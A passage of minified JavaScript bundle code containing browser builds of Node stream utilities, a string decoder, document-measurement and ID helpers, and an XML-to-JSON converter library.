0!==this._writableState&&this._writableState.destroyed},set:function(J){this._writableState&&(this._writableState.destroyed=J)}}),v.prototype.destroy=x.destroy,v.prototype._undestroy=x.undestroy,v.prototype._destroy=function(J,Z){Z(J)}},828:(Q,F,E)=>{"use strict";var g,b=E(4155);function _(le,ye,z){return ye in le?Object.defineProperty(le,ye,{value:z,enumerable:!0,configurable:!0,writable:!0}):le[ye]=z,le}var y=E(1086),M=Symbol("lastResolve"),p=Symbol("lastReject"),D=Symbol("error"),w=Symbol("ended"),x=Symbol("lastPromise"),S=Symbol("handlePromise"),O=Symbol("stream");function U(le,ye){return{value:le,done:ye}}function K(le){var ye=le[M];if(null!==ye){var z=le[O].read();null!==z&&(le[x]=null,le[M]=null,le[p]=null,ye(U(z,!1)))}}function ee(le){b.nextTick(K,le)}var se=Object.getPrototypeOf(function(){}),ve=Object.setPrototypeOf((_(g={get stream(){return this[O]},next:function(){var le=this,ye=this[D];if(null!==ye)return Promise.reject(ye);if(this[w])return Promise.resolve(U(void 0,!0));if(this[O].destroyed)return new Promise(function(A,v){b.nextTick(function(){le[D]?v(le[D]):A(U(void 0,!0))})});var z,A,v,l=this[x];if(l)z=new Promise((A=l,v=this,function(P,G){A.then(function(){v[w]?P(U(void 0,!0)):v[S](P,G)},G)}));else{var f=this[O].read();if(null!==f)return Promise.resolve(U(f,!1));z=new Promise(this[S])}return this[x]=z,z}},Symbol.asyncIterator,function(){return this}),_(g,"return",function(){var le=this;return new Promise(function(ye,z){le[O].destroy(null,function(l){l?z(l):ye(U(void 0,!0))})})}),g),se);Q.exports=function(le){var ye,z=Object.create(ve,(_(ye={},O,{value:le,writable:!0}),_(ye,M,{value:null,writable:!0}),_(ye,p,{value:null,writable:!0}),_(ye,D,{value:null,writable:!0}),_(ye,w,{value:le._readableState.endEmitted,writable:!0}),_(ye,S,{value:function(l,f){var A=z[O].read();A?(z[x]=null,z[M]=null,z[p]=null,l(U(A,!1))):(z[M]=l,z[p]=f)},writable:!0}),ye));return z[x]=null,y(le,function(l){if(l&&"ERR_STREAM_PREMATURE_CLOSE"!==l.code){var f=z[p];return null!==f&&(z[x]=null,z[M]=null,z[p]=null,f(l)),void(z[D]=l)}var A=z[M];null!==A&&(z[x]=null,z[M]=null,z[p]=null,A(U(void 0,!0))),z[w]=!0}),le.on("readable",ee.bind(null,z)),z}},9686:(Q,F,E)=>{"use strict";function g(D,w){var x=Object.keys(D);if(Object.getOwnPropertySymbols){var S=Object.getOwnPropertySymbols(D);w&&(S=S.filter(function(O){return Object.getOwnPropertyDescriptor(D,O).enumerable})),x.push.apply(x,S)}return x}function b(D,w,x){return w in D?Object.defineProperty(D,w,{value:x,enumerable:!0,configurable:!0,writable:!0}):D[w]=x,D}var y=E(8764).Buffer,M=E(5575).inspect,p=M&&M.custom||"inspect";Q.exports=function(){function D(){(function(S,O){if(!(S instanceof O))throw new TypeError("Cannot call a class as a function")})(this,D),this.head=null,this.tail=null,this.length=0}var x;return x=[{key:"push",value:function(S){var O={data:S,next:null};this.length>0?this.tail.next=O:this.head=O,this.tail=O,++this.length}},{key:"unshift",value:function(S){var O={data:S,next:this.head};0===this.length&&(this.tail=O),this.head=O,++this.length}},{key:"shift",value:function(){if(0!==this.length){var S=this.head.data;return this.head=1===this.length?this.tail=null:this.head.next,--this.length,S}}},{key:"clear",value:function(){this.head=this.tail=null,this.length=0}},{key:"join",value:function(S){if(0===this.length)return"";for(var O=this.head,U=""+O.data;O=O.next;)U+=S+O.data;return U}},{key:"concat",value:function(S){if(0===this.length)return y.alloc(0);for(var ee=y.allocUnsafe(S>>>0),se=this.head,ve=0;se;)y.prototype.copy.call(se.data,ee,ve),ve+=se.data.length,se=se.next;return ee}},{key:"consume",value:function(S,O){var U;return S<this.head.data.length?(U=this.head.data.slice(0,S),this.head.data=this.head.data.slice(S)):U=S===this.head.data.length?this.shift():O?this._getString(S):this._getBuffer(S),U}},{key:"first",value:function(){return this.head.data}},{key:"_getString",value:function(S){var O=this.head,U=1,K=O.data;for(S-=K.length;O=O.next;){var ee=O.data,se=S>ee.length?ee.length:S;if(K+=se===ee.length?ee:ee.slice(0,S),0==(S-=se)){se===ee.length?(++U,this.head=O.next?O.next:this.tail=null):(this.head=O,O.data=ee.slice(se));break}++U}return this.length-=U,K}},{key:"_getBuffer",value:function(S){var O=y.allocUnsafe(S),U=this.head,K=1;for(U.data.copy(O),S-=U.data.length;U=U.next;){var ee=U.data,se=S>ee.length?ee.length:S;if(ee.copy(O,O.length-S,0,se),0==(S-=se)){se===ee.length?(++K,this.head=U.next?U.next:this.tail=null):(this.head=U,U.data=ee.slice(se));break}++K}return this.length-=K,O}},{key:p,value:function(S,O){return M(this,function(U){for(var K=1;K<arguments.length;K++){var ee=null!=arguments[K]?arguments[K]:{};K%2?g(Object(ee),!0).forEach(function(se){b(U,se,ee[se])}):Object.getOwnPropertyDescriptors?Object.defineProperties(U,Object.getOwnPropertyDescriptors(ee)):g(Object(ee)).forEach(function(se){Object.defineProperty(U,se,Object.getOwnPropertyDescriptor(ee,se))})}return U}({},O,{depth:0,customInspect:!1}))}}],x&&function _(D,w){for(var x=0;x<w.length;x++){var S=w[x];S.enumerable=S.enumerable||!1,S.configurable=!0,"value"in S&&(S.writable=!0),Object.defineProperty(D,S.key,S)}}(D.prototype,x),D}()},1029:(Q,F,E)=>{"use strict";var g=E(4155);function b(M,p){y(M,p),_(M)}function _(M){M._writableState&&!M._writableState.emitClose||M._readableState&&!M._readableState.emitClose||M.emit("close")}function y(M,p){M.emit("error",p)}Q.exports={destroy:function(M,p){var D=this;return this._readableState&&this._readableState.destroyed||this._writableState&&this._writableState.destroyed?(p?p(M):M&&(this._writableState?this._writableState.errorEmitted||(this._writableState.errorEmitted=!0,g.nextTick(y,this,M)):g.nextTick(y,this,M)),this):(this._readableState&&(this._readableState.destroyed=!0),this._writableState&&(this._writableState.destroyed=!0),this._destroy(M||null,function(S){!p&&S?D._writableState?D._writableState.errorEmitted?g.nextTick(_,D):(D._writableState.errorEmitted=!0,g.nextTick(b,D,S)):g.nextTick(b,D,S):p?(g.nextTick(_,D),p(S)):g.nextTick(_,D)}),this)},undestroy:function(){this._readableState&&(this._readableState.destroyed=!1,this._readableState.reading=!1,this._readableState.ended=!1,this._readableState.endEmitted=!1),this._writableState&&(this._writableState.destroyed=!1,this._writableState.ended=!1,this._writableState.ending=!1,this._writableState.finalCalled=!1,this._writableState.prefinished=!1,this._writableState.finished=!1,this._writableState.errorEmitted=!1)},errorOrDestroy:function(M,p){var D=M._readableState,w=M._writableState;D&&D.autoDestroy||w&&w.autoDestroy?M.destroy(p):M.emit("error",p)}}},1086:(Q,F,E)=>{"use strict";var g=E(8106).q.ERR_STREAM_PREMATURE_CLOSE;function b(){}Q.exports=function _(y,M,p){if("function"==typeof M)return _(y,null,M);var le,ye;M||(M={}),le=p||b,ye=!1,p=function(){if(!ye){ye=!0;for(var z=arguments.length,l=new Array(z),f=0;f<z;f++)l[f]=arguments[f];le.apply(this,l)}};var D=M.readable||!1!==M.readable&&y.readable,w=M.writable||!1!==M.writable&&y.writable,x=function(){y.writable||O()},S=y._writableState&&y._writableState.finished,O=function(){w=!1,S=!0,D||p.call(y)},U=y._readableState&&y._readableState.endEmitted,K=function(){D=!1,U=!0,w||p.call(y)},ee=function(le){p.call(y,le)},se=function(){var le;return D&&!U?(y._readableState&&y._readableState.ended||(le=new g),p.call(y,le)):w&&!S?(y._writableState&&y._writableState.ended||(le=new g),p.call(y,le)):void 0},ve=function(){y.req.on("finish",O)};return function(le){return le.setHeader&&"function"==typeof le.abort}(y)?(y.on("complete",O),y.on("abort",se),y.req?ve():y.on("request",ve)):w&&!y._writableState&&(y.on("end",x),y.on("close",x)),y.on("end",K),y.on("finish",O),!1!==M.error&&y.on("error",ee),y.on("close",se),function(){y.removeListener("complete",O),y.removeListener("abort",se),y.removeListener("request",ve),y.req&&y.req.removeListener("finish",O),y.removeListener("end",x),y.removeListener("close",x),y.removeListener("finish",O),y.removeListener("end",K),y.removeListener("error",ee),y.removeListener("close",se)}}},1265:Q=>{Q.exports=function(){throw new Error("Readable.from is not available in the browser")}},6472:(Q,F,E)=>{"use strict";var g,b=E(8106).q,_=b.ERR_MISSING_ARGS,y=b.ERR_STREAM_DESTROYED;function M(S){if(S)throw S}function p(S,O,U,K){var ve,le;ve=K,le=!1,K=function(){le||(le=!0,ve.apply(void 0,arguments))};var ee=!1;S.on("close",function(){ee=!0}),void 0===g&&(g=E(1086)),g(S,{readable:O,writable:U},function(ve){if(ve)return K(ve);ee=!0,K()});var se=!1;return function(ve){if(!ee&&!se)return se=!0,function(le){return le.setHeader&&"function"==typeof le.abort}(S)?S.abort():"function"==typeof S.destroy?S.destroy():void K(ve||new y("pipe"))}}function D(S){S()}function w(S,O){return S.pipe(O)}function x(S){return S.length?"function"!=typeof S[S.length-1]?M:S.pop():M}Q.exports=function(){for(var S=arguments.length,O=new Array(S),U=0;U<S;U++)O[U]=arguments[U];var K,ee=x(O);if(Array.isArray(O[0])&&(O=O[0]),O.length<2)throw new _("streams");var se=O.map(function(ve,le){var ye=le<O.length-1;return p(ve,ye,le>0,function(z){K||(K=z),z&&se.forEach(D),ye||(se.forEach(D),ee(K))})});return O.reduce(w)}},94:(Q,F,E)=>{"use strict";var g=E(8106).q.ERR_INVALID_OPT_VALUE;Q.exports={getHighWaterMark:function(b,_,y,M){var D,p=null!=(D=_).highWaterMark?D.highWaterMark:M?D[y]:null;if(null!=p){if(!isFinite(p)||Math.floor(p)!==p||p<0)throw new g(M?y:"highWaterMark",p);return Math.floor(p)}return b.objectMode?16:16384}}},3194:(Q,F,E)=>{Q.exports=E(7187).EventEmitter},2553:(Q,F,E)=>{"use strict";var g=E(9509).Buffer,b=g.isEncoding||function(U){switch((U=""+U)&&U.toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":case"raw":return!0;default:return!1}};function _(U){var K;switch(this.encoding=function(ee){var se=function(ve){if(!ve)return"utf8";for(var le;;)switch(ve){case"utf8":case"utf-8":return"utf8";case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return"utf16le";case"latin1":case"binary":return"latin1";case"base64":case"ascii":case"hex":return ve;default:if(le)return;ve=(""+ve).toLowerCase(),le=!0}}(ee);if("string"!=typeof se&&(g.isEncoding===b||!b(ee)))throw new Error("Unknown encoding: "+ee);return se||ee}(U),this.encoding){case"utf16le":this.text=p,this.end=D,K=4;break;case"utf8":this.fillLast=M,K=4;break;case"base64":this.text=w,this.end=x,K=3;break;default:return this.write=S,void(this.end=O)}this.lastNeed=0,this.lastTotal=0,this.lastChar=g.allocUnsafe(K)}function y(U){return U<=127?0:U>>5==6?2:U>>4==14?3:U>>3==30?4:U>>6==2?-1:-2}function M(U){var K=this.lastTotal-this.lastNeed,ee=function(se,ve,le){if(128!=(192&ve[0]))return se.lastNeed=0,"\ufffd";if(se.lastNeed>1&&ve.length>1){if(128!=(192&ve[1]))return se.lastNeed=1,"\ufffd";if(se.lastNeed>2&&ve.length>2&&128!=(192&ve[2]))return se.lastNeed=2,"\ufffd"}}(this,U);return void 0!==ee?ee:this.lastNeed<=U.length?(U.copy(this.lastChar,K,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal)):(U.copy(this.lastChar,K,0,U.length),void(this.lastNeed-=U.length))}function p(U,K){if((U.length-K)%2==0){var ee=U.toString("utf16le",K);if(ee){var se=ee.charCodeAt(ee.length-1);if(se>=55296&&se<=56319)return this.lastNeed=2,this.lastTotal=4,this.lastChar[0]=U[U.length-2],this.lastChar[1]=U[U.length-1],ee.slice(0,-1)}return ee}return this.lastNeed=1,this.lastTotal=2,this.lastChar[0]=U[U.length-1],U.toString("utf16le",K,U.length-1)}function D(U){var K=U&&U.length?this.write(U):"";return this.lastNeed?K+this.lastChar.toString("utf16le",0,this.lastTotal-this.lastNeed):K}function w(U,K){var ee=(U.length-K)%3;return 0===ee?U.toString("base64",K):(this.lastNeed=3-ee,this.lastTotal=3,1===ee?this.lastChar[0]=U[U.length-1]:(this.lastChar[0]=U[U.length-2],this.lastChar[1]=U[U.length-1]),U.toString("base64",K,U.length-ee))}function x(U){var K=U&&U.length?this.write(U):"";return this.lastNeed?K+this.lastChar.toString("base64",0,3-this.lastNeed):K}function S(U){return U.toString(this.encoding)}function O(U){return U&&U.length?this.write(U):""}F.s=_,_.prototype.write=function(U){if(0===U.length)return"";var K,ee;if(this.lastNeed){if(void 0===(K=this.fillLast(U)))return"";ee=this.lastNeed,this.lastNeed=0}else ee=0;return ee<U.length?K?K+this.text(U,ee):this.text(U,ee):K||""},_.prototype.end=function(U){var K=U&&U.length?this.write(U):"";return this.lastNeed?K+"\ufffd":K},_.prototype.text=function(U,K){var ee=function(ve,le,ye){var z=le.length-1;if(z<ye)return 0;var l=y(le[z]);return l>=0?(l>0&&(ve.lastNeed=l-1),l):--z<ye||-2===l?0:(l=y(le[z]))>=0?(l>0&&(ve.lastNeed=l-2),l):--z<ye||-2===l?0:(l=y(le[z]))>=0?(l>0&&(2===l?l=0:ve.lastNeed=l-3),l):0}(this,U,K);if(!this.lastNeed)return U.toString("utf8",K);this.lastTotal=ee;var se=U.length-(ee-this.lastNeed);return U.copy(this.lastChar,0,se),U.toString("utf8",K,se)},_.prototype.fillLast=function(U){if(this.lastNeed<=U.length)return U.copy(this.lastChar,this.lastTotal-this.lastNeed,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal);U.copy(this.lastChar,this.lastTotal-this.lastNeed,0,U.length),this.lastNeed-=U.length}},5457:(Q,F,E)=>{"use strict";E.d(F,{vw:()=>_,rq:()=>b,EL:()=>M,NY:()=>y});let g=0;const b=p=>Math.floor(p/25.4*72*20),_=p=>Math.floor(72*p*20),y=()=>++g,M=()=>((p=21)=>{let D="",w=p;for(;w--;)D+="useandom-26T198340PX75pxJACKVERYMINDBUSHWOLF_GQZbfghjklqvwyzrict"[64*Math.random()|0];return D})().toLowerCase()},5575:(Q,F,E)=>{"use strict";E.r(F),E.d(F,{convertInchesToTwip:()=>g.vw,convertMillimetersToTwip:()=>g.rq,dateTimeValue:()=>b.sF,decimalNumber:()=>b.vH,eighthPointMeasureValue:()=>b.LV,hexColorValue:()=>b.dg,hpsMeasureValue:()=>b.KR,longHexNumber:()=>b.mA,measurementOrPercentValue:()=>b.aB,percentageValue:()=>b.wp,pointMeasureValue:()=>b.gg,positiveUniversalMeasureValue:()=>b._p,shortHexNumber:()=>b.G0,signedHpsMeasureValue:()=>b.Rg,signedTwipsMeasureValue:()=>b.xb,twipsMeasureValue:()=>b.Jd,uCharHexNumber:()=>b.xD,uniqueId:()=>g.EL,uniqueNumericId:()=>g.NY,universalMeasureValue:()=>b.KC,unsignedDecimalNumber:()=>b.f$});var g=E(5457),b=E(6595)},6595:(Q,F,E)=>{"use strict";E.d(F,{G0:()=>M,Jd:()=>ee,KC:()=>D,KR:()=>U,LV:()=>le,Rg:()=>K,_p:()=>x,aB:()=>ve,dg:()=>S,f$:()=>b,gg:()=>ye,mA:()=>y,sF:()=>z,vH:()=>g,wp:()=>se,xD:()=>p,xb:()=>O});const g=l=>{if(isNaN(l))throw new Error(`Invalid value '${l}' specified. Must be an integer.`);return Math.floor(l)},b=l=>{const f=g(l);if(f<0)throw new Error(`Invalid value '${l}' specified. Must be a positive integer.`);return f},_=(l,f)=>{const A=2*f;if(l.length!==A||isNaN(Number(`0x${l}`)))throw new Error(`Invalid hex value '${l}'. Expected ${A} digit hex value`);return l},y=l=>_(l,4),M=l=>_(l,2),p=l=>_(l,1),D=l=>{const f=l.slice(-2);if(!w.includes(f))throw new Error(`Invalid unit '${f}' specified. Valid units are ${w.join(", ")}`);const A=l.substring(0,l.length-2);if(isNaN(Number(A)))throw new Error(`Invalid value '${A}' specified. Expected a valid number.`);return`${Number(A)}${f}`},w=["mm","cm","in","pt","pc","pi"],x=l=>{const f=D(l);if(parseFloat(f)<0)throw new Error(`Invalid value '${f}' specified. Expected a positive number.`);return f},S=l=>{if("auto"===l)return l;const f="#"===l.charAt(0)?l.substring(1):l;return _(f,3)},O=l=>"string"==typeof l?D(l):g(l),U=l=>"string"==typeof l?x(l):b(l),K=l=>"string"==typeof l?D(l):g(l),ee=l=>"string"==typeof l?x(l):b(l),se=l=>{if("%"!==l.slice(-1))throw new Error(`Invalid value '${l}'. Expected percentage value (eg '55%')`);const f=l.substring(0,l.length-1);if(isNaN(Number(f)))throw new Error(`Invalid value '${f}' specified. Expected a valid number.`);return`${Number(f)}%`},ve=l=>"number"==typeof l?g(l):"%"===l.slice(-1)?se(l):D(l),le=b,ye=b,z=l=>l.toISOString()},4927:(Q,F,E)=>{function g(b){try{if(!E.g.localStorage)return!1}catch(y){return!1}var _=E.g.localStorage[b];return null!=_&&"true"===String(_).toLowerCase()}Q.exports=function(b,_){if(g("noDeprecation"))return b;var y=!1;return function(){if(!y){if(g("throwDeprecation"))throw new Error(_);g("traceDeprecation")?console.trace(_):console.warn(_),y=!0}return b.apply(this,arguments)}}},9881:Q=>{Q.exports={isArray:function(F){return Array.isArray?Array.isArray(F):"[object Array]"===Object.prototype.toString.call(F)}}},7888:(Q,F,E)=>{var g=E(1229),b=E(1388),_=E(6501),y=E(4673);Q.exports={xml2js:g,xml2json:b,js2xml:_,json2xml:y}},6501:(Q,F,E)=>{var g,b,_=E(4740),y=E(9881).isArray;function M(le,ye,z){return(!z&&le.spaces?"\n":"")+Array(ye+1).join(le.spaces)}function p(le,ye,z){if(ye.ignoreAttributes)return"";"attributesFn"in ye&&(le=ye.attributesFn(le,b,g));var l,f,A,v,P=[];for(l in le)le.hasOwnProperty(l)&&null!=le[l]&&(v=ye.noQuotesForNativeAttributes&&"string"!=typeof le[l]?"":'"',f=(f=""+le[l]).replace(/"/g,"&quot;"),A="attributeNameFn"in ye?ye.attributeNameFn(l,f,b,g):l,P.push(ye.spaces&&ye.indentAttributes?M(ye,z+1,!1):" "),P.push(A+"="+v+("attributeValueFn"in ye?ye.attributeValueFn(f,l,b,g):f)+v));return le&&Object.keys(le).length&&ye.spaces&&ye.indentAttributes&&P.push(M(ye,z,!1)),P.join("")}function D(le,ye,z){return g=le,b="xml",ye.ignoreDeclaration?"":"<?xml"+p(le[ye.attributesKey],ye,z)+"?>"}function w(le,ye,z){if(ye.ignoreInstruction)return"";var l;for(l in le)if(le.hasOwnProperty(l))break;var f="instructionNameFn"in ye?ye.instructionNameFn(l,le[l],b,g):l;if("object"==typeof le[l])return g=le,b=f,"<?"+f+p(le[l][ye.attributesKey],ye,z)+"?>";var A=le[l]?le[l]:"";return"instructionFn"in ye&&(A=ye.instructionFn(A,l,b,g)),"<?"+f+(A?" "+A:"")+"?>"}function x(le,ye){return ye.ignoreComment?"":"\x3c!--"+("commentFn"in ye?ye.commentFn(le,b,g):le)+"--\x3e"}function S(le,ye){return ye.ignoreCdata?"":"<![CDATA["+("cdataFn"in ye?ye.cdataFn(le,b,g):le.replace("]]>","]]]]><![CDATA[>"))+"]]>"}function O(le,ye){return ye.ignoreDoctype?"":"<!DOCTYPE "+("doctypeFn"in ye?ye.doctypeFn(le,b,g):le)+">"}function U(le,ye){return ye.ignoreText?"":(le=(le=(le=""+le).replace(/&amp;/g,"&")).replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;"),"textFn"in ye?ye.textFn(le,b,g):le)}function K(le,ye,z,l){return le.reduce(function(f,A){var v=M(ye,z,l&&!f);switch(A.type){case"element":return f+v+function(G,X,L){g=G,b=G.name;var h=[],R="elementNameFn"in X?X.elementNameFn(G.name,G):G.name;h.push("<"+R),G[X.attributesKey]&&h.push(p(G[X.attributesKey],X,L));var J=G[X.elementsKey]&&G[X.elementsKey].length||G[X.attributesKey]&&"preserve"===G[X.attributesKey]["xml:space"];return J||(J="fullTagEmptyElementFn"in X?X.fullTagEmptyElementFn(G.name,G):X.fullTagEmptyElement),J?(h.push(">"),G[X.elementsKey]&&G[X.elementsKey].length&&(h.push(K(G[X.elementsKey],X,L+1)),g=G,b=G.name),h.push(X.spaces&&function(Z,ue){var Ie;if(Z.elements&&Z.elements.length)for(Ie=0;Ie<Z.elements.length;++Ie)switch(Z.elements[Ie][ue.typeKey]){case"text":if(ue.indentText)return!0;break;case"cdata":if(ue.indentCdata)return!0;break;case"instruction":if(ue.indentInstruction)return!0;break;default:return!0}return!1}(G,X)?"\n"+Array(L+1).join(X.spaces):""),h.push("</"+R+">")):h.push("/>"),h.join("")}(A,ye,z);case"comment":return f+v+x(A[ye.commentKey],ye);case"doctype":return f+v+O(A[ye.doctypeKey],ye);case"cdata":return f+(ye.indentCdata?v:"")+S(A[ye.cdataKey],ye);case"text":return f+(ye.indentText?v:"")+U(A[ye.textKey],ye);case"instruction":var P={};return P[A[ye.nameKey]]=A[ye.attributesKey]?A:A[ye.instructionKey],f+(ye.indentInstruction?v:"")+w(P,ye,z)}},"")}function ee(le,ye,z){var l;for(l in le)if(le.hasOwnProperty(l))switch(l){case ye.parentKey:case ye.attributesKey:break;case ye.textKey:if(ye.indentText||z)return!0;break;case ye.cdataKey:if(ye.indentCdata||z)return!0;break;case ye.instructionKey:if(ye.indentInstruction||z)return!0;break;default:return!0}return!1}function se(le,ye,z,l,f){g=le,b=ye;var A="elementNameFn"in z?z.elementNameFn(ye,le):ye;if(null==le||""===le)return"fullTagEmptyElementFn"in z&&z.fullTagEmptyElementFn(ye,le)||z.fullTagEmptyElement?"<"+A+"></"+A+">":"<"+A+"/>";var v=[];if(ye){if(v.push("<"+A),"object"!=typeof le)return v.push(">"+U(le,z)+"</"+A+">"),v.join("");le[z.attributesKey]&&v.push(p(le[z.attributesKey],z,l));var P=ee(le,z,!0)||le[z.attributesKey]&&"preserve"===le[z.attributesKey]["xml:space"];if(P||(P="fullTagEmptyElementFn"in z?z.fullTagEmptyElementFn(ye,le):z.fullTagEmptyElement),!P)return v.push("/>"),v.join("");v.push(">")}return v.push(ve(le,z,l+1,!1)),g=le,b=ye,ye&&v.push((f?M(z,l,!1):"")+"</"+A+">"),v.join("")}function ve(le,ye,z,l){var f,A,v,P=[];for(A in le)if(le.hasOwnProperty(A))for(v=y(le[A])?le[A]:[le[A]],f=0;f<v.length;++f){switch(A){case ye.declarationKey:P.push(D(v[f],ye,z));break;case ye.instructionKey:P.push((ye.indentInstruction?M(ye,z,l):"")+w(v[f],ye,z));break;case ye.attributesKey:case ye.parentKey:break;case ye.textKey:P.push((ye.indentText?M(ye,z,l):"")+U(v[f],ye));break;case ye.cdataKey:P.push((ye.indentCdata?M(ye,z,l):"")+S(v[f],ye));break;case ye.doctypeKey:P.push(M(ye,z,l)+O(v[f],ye));break;case ye.commentKey:P.push(M(ye,z,l)+x(v[f],ye));break;default:P.push(M(ye,z,l)+se(v[f],A,ye,z,ee(v[f],ye)))}l=l&&!P.length}return P.join("")}Q.exports=function(le,ye){var f;f=_.copyOptions(ye),_.ensureFlagExists("ignoreDeclaration",f),_.ensureFlagExists("ignoreInstruction",f),_.ensureFlagExists("ignoreAttributes",f),_.ensureFlagExists("ignoreText",f),_.ensureFlagExists("ignoreComment",f),_.ensureFlagExists("ignoreCdata",f),_.ensureFlagExists("ignoreDoctype",f),_.ensureFlagExists("compact",f),_.ensureFlagExists("indentText",f),_.ensureFlagExists("indentCdata",f),_.ensureFlagExists("indentAttributes",f),_.ensureFlagExists("indentInstruction",f),_.ensureFlagExists("fullTagEmptyElement",f),_.ensureFlagExists("noQuotesForNativeAttributes",f),_.ensureSpacesExists(f),"number"==typeof f.spaces&&(f.spaces=Array(f.spaces+1).join(" ")),_.ensureKeyExists("declaration",f),_.ensureKeyExists("instruction",f),_.ensureKeyExists("attributes",f),_.ensureKeyExists("text",f),_.ensureKeyExists("comment",f),_.ensureKeyExists("cdata",f),_.ensureKeyExists("doctype",f),_.ensureKeyExists("type",f),_.ensureKeyExists("name",f),_.ensureKeyExists("elements",f),_.checkFnExists("doctype",f),_.checkFnExists("instruction",f),_.checkFnExists("cdata",f),_.checkFnExists("comment",f),_.checkFnExists("text",f),_.checkFnExists("instructionName",f),_.checkFnExists("elementName",f),_.checkFnExists("attributeName",f),_.checkFnExists("attributeValue",f),_.checkFnExists("attributes",f),_.checkFnExists("fullTagEmptyElement",f);var z=[];return g=le,b="_root_",(ye=f).compact?z.push(ve(le,ye,0,!0)):(le[ye.declarationKey]&&z.push(D(le[ye.declarationKey],ye,0)),le[ye.elementsKey]&&le[ye.elementsKey].length&&z.push(K(le[ye.elementsKey],ye,0,!z.length))),z.join("")}},4673:(Q,F,E)=>{var g=E(6501);Q.exports=function(b,_){b instanceof ie&&(b=b.toString());var y=null;if("string"==typeof b)try{y=JSON.parse(b)}catch(M){throw new Error("The JSON structure is invalid")}else y=b;return g(y,_)}},4740:(Q,F,E)=>{var g=E(9881).isArray;Q.exports={copyOptions:function(b){var _,y={};for(_ in b)b.hasOwnProperty(_)&&(y[_]=b[_]);return y},ensureFlagExists:function(b,_){b in _&&"boolean"==typeof _[b]||(_[b]=!1)},ensureSpacesExists:function(b){(!("spaces"in b)||"number"!=typeof b.spaces&&"string"!=typeof b.spaces)&&(b.spaces=0)},ensureAlwaysArrayExists:function(b){"alwaysArray"in b&&("boolean"==typeof b.alwaysArray||g(b.alwaysArray))||(b.alwaysArray=!1)},ensureKeyExists:function(b,_){b+"Key"in _&&"string"==typeof _[b+"Key"]||(_[b+"Key"]=_.compact?"_"+b:b)},checkFnExists:function(b,_){return b+"Fn"in _}}},1229:(Q,F,E)=>{var g,b,_=E(6099),y=E(4740),M=E(9881).isArray;function p(le){var ye=Number(le);if(!isNaN(ye))return ye;var z=le.toLowerCase();return"true"===z||"false"!==z&&le}function D(le,ye){var z;if(g.compact){if(!b[g[le+"Key"]]&&(M(g.alwaysArray)?-1!==g.alwaysArray.indexOf(g[le+"Key"]):g.alwaysArray)&&(b[g[le+"Key"]]=[]),b[g[le+"Key"]]&&!M(b[g[le+"Key"]])&&(b[g[le+"Key"]]=[b[g[le+"Key"]]]),le+"Fn"in g&&"string"==typeof ye&&(ye=g[le+"Fn"](ye,b)),"instruction"===le&&("instructionFn"in g||"instructionNameFn"in g))for(z in ye)if(ye.hasOwnProperty(z))if("instructionFn"in g)ye[z]=g.instructionFn(ye[z],z,b);else{var l=ye[z];delete ye[z],ye[g.instructionNameFn(z,l,b)]=l}M(b[g[le+"Key"]])?b[g[le+"Key"]].push(ye):b[g[le+"Key"]]=ye}else{b[g.elementsKey]||(b[g.elementsKey]=[]);var f={};if(f[g.typeKey]=le,"instruction"===le){for(z in ye)if(ye.hasOwnProperty(z))break;f[g.nameKey]="instructionNameFn"in g?g.instructionNameFn(z,ye,b):z,g.instructionHasAttributes?(f[g.attributesKey]=ye[z][g.attributesKey],"instructionFn"in g&&(f[g.attributesKey]=g.instructionFn(f[g.attributesKey],z,b))):("instructionFn"in g&&(ye[z]=g.instructionFn(ye[z],z,b)),f[g.instructionKey]=ye[z])}else le+"Fn"in g&&(ye=g[le+"Fn"](ye,b)),f[g[le+"Key"]]=ye;g.addParent&&(f[g.parentKey]=b),b[g.elementsKey].push(f)}}function w(le){var ye;if("attributesFn"in g&&le&&(le=g.attributesFn(le,b)),(g.trim||"attributeValueFn"in g||"attributeNameFn"in g||g.nativeTypeAttributes)&&le)for(ye in le)if(le.hasOwnProperty(ye)&&(g.trim&&(le[ye]=le[ye].trim()),g.nativeTypeAttributes&&(le[ye]=p(le[ye])),"attributeValueFn"in g&&(le[ye]=g.attributeValueFn(le[ye],ye,b)),"attributeNameFn"in g)){var z=le[ye];delete le[ye],le[g.attributeNameFn(ye,le[ye],b)]=z}return le}function x(le){var ye={};if(le.body&&("xml"===le.name.toLowerCase()||g.instructionHasAttributes)){for(var z,l=/([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|(\w+))\s*/g;null!==(z=l.exec(le.body));)ye[z[1]]=z[2]||z[3]||z[4];ye=w(ye)}if("xml"===le.name.toLowerCase()){if(g.ignoreDeclaration)return;b[g.declarationKey]={},Object.keys(ye).length&&(b[g.declarationKey][g.attributesKey]=ye),g.addParent&&(b[g.declarationKey][g.parentKey]=b)}else{if(g.ignoreInstruction)return;g.trim&&(le.body=le.body.trim());var f={};g.instructionHasAttributes&&Object.keys(ye).length?(f[le.name]={},f[le.name][g.attributesKey]=ye):f[le.name]=le.body,D("instruction",f)}}function S(le,ye){var z;if("object"==typeof le&&(ye=le.attributes,le=le.name),ye=w(ye),"elementNameFn"in g&&(le=g.elementNameFn(le,b)),g.compact){var l;if(z={},!g.ignoreAttributes&&ye&&Object.keys(ye).length)for(l in z[g.attributesKey]={},ye)ye.hasOwnProperty(l)&&(z[g.attributesKey][l]=ye[l]);!(le in b)&&(M(g.alwaysArray)?-1!==g.alwaysArray.indexOf(le):g.alwaysArray)&&(b[le]=[]),b[le]&&!M(b[le])&&(b[le]=[b[le]]),M(b[le])?b[le].push(z):b[le]=z}else b[g.elementsKey]||(b[g.elementsKey]=[]),(z={})[g.typeKey]="element",z[g.nameKey]=le,!g.ignoreAttributes&&ye&&Object.keys(ye).length&&(z[g.attributesKey]=ye),g.alwaysChildren&&(z[g.elementsKey]=[]),b[g.elementsKey].push(z);z[g.parentKey]=b,b=z}function O(le){g.ignoreText||(le.trim()||g.captureSpacesBetweenElements)&&(g.trim&&(le=le.trim()),g.nativeType&&(le=p(le)),g.sanitize&&(le=le.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")),D("text",le))}function U(le){g.ignoreComment||(g.trim&&(le=le.trim()),D("comment",le))}function K(le){var ye=b[g.parentKey];g.addParent||delete 